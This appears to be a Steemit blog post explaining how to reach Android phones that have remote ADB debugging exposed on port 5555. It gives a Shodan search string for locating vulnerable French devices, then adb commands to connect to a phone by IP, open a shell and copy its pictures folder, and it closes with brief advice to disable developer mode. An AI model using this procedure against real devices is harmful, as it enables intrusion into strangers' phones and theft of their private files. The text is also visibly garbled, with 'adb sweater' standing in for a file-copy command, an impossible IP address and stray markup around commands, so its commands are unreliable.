How To Hack Android at distance
Hello my favorite little Dyrknauts,
It's holidays, but I keep writing small things just for you.
Some of you have probably had the opportunity to read in the news of June, that manufacturers of smartphones ... little concerned about the privacy of their consumers have allowed activate a rather disturbing option ...
The remote ADB connection!
Normally, for this, it is necessary that the owner of an Android smartphone activates the developer mode (a hidden menu to activate / deactivate some "advanced" functions and also access particular data from the phones ... in short a developer trick) through a particular manipulation (the kind of manipulation that is not done by chance), and by activating in this hidden menu an option that allows you to connect to your phone remotely to be able to do it advanced manipulations ... again ... this is a function for developers!
The risks
I will not expand on all the functions that can use ADB (Android Debug Bridge) ...
But on a few, including the fact of installing / uninstalling applications ... or access to the files on the smartphone.
Who is concerned ?
Probably some of you ... who have followed some crazy tutorials on the internet that make you do things you do not control ... others too because as I said at the beginning. .. you may not be specifically informed, either because you bought a used phone on leboncoin (something never to do) ... or because the manufacturer has allowed himself to leave a door wide open on your private life ...
Shodan, serves you on a silver platter!
Shodan is the search engine for connected objects, it allows to find connected objects through different terms (port, network, brand, country ...)
It indexes a number of objects connected to the fabulous world of the internet ... indexing the vulnerable devices ...
It is a tool popular with hackers.
A simple search for the following terms will give you a list of French devices affected by this "small" problem
android debug bridge country: "FR"
You will be able to see if you have been indexed or not;)
How do hackers access my data?
The Android development framework offers a binary (an application) "ADB" ...
Also, you will need to first have ADB:
https://www.xda-developers.com/install-adb-windows-macos-linux/
This pre-requisite filled, the following operations is quite simple, the hacker starts a "server adb"
adb kill-server
adb start-server
Here I make a "kill-server" to "restart" your ADB server if it is instantiated.
Subsequently it's simple ... I connect to the IP address of the smartphone concerned with the following command:
### adb connect 86.253.188.256
or
*****connect 86.253.188.232:5555*****
86.253.188.256 and 86.253.188.232 are ip addresses taken at random, replace them by the ip of your smartphone (or the one that you wish and which ... obviously ... belongs to you)
> 5555 is the default port of ADB
And that's it ... all you have to do is start a shell
adb shell
There normally, if you master linux, you will have the opportunity to browse the phone's folders, and access files ...
An attacker can also recover the directory / folder of a phone with the following command:
adb sweater / sdcard / Pictures / tmp /
Here, I copy the contents of the folder "/ sdcard / Pictures" into the "/ tmp" folder of my machine.
Conclusion
If you do not know what is the debug mode of your smartphone ... do not activate it, even if you need to install an application that is "surely" great and that requires to do so.
Be careful in your setting that no "developer mode" is visible ... if so, check that everything inside is disabled.
Take the time to educate others about this topic.
Vote and follow me for more hacking posts
On these good words, I wish you a good Weekend !!!
Resteemed your article. This article was resteemed because you are part of the New Steemians project. You can learn more about it here: https://steemit.com/introduceyourself/@gaman/new-steemians-project-launch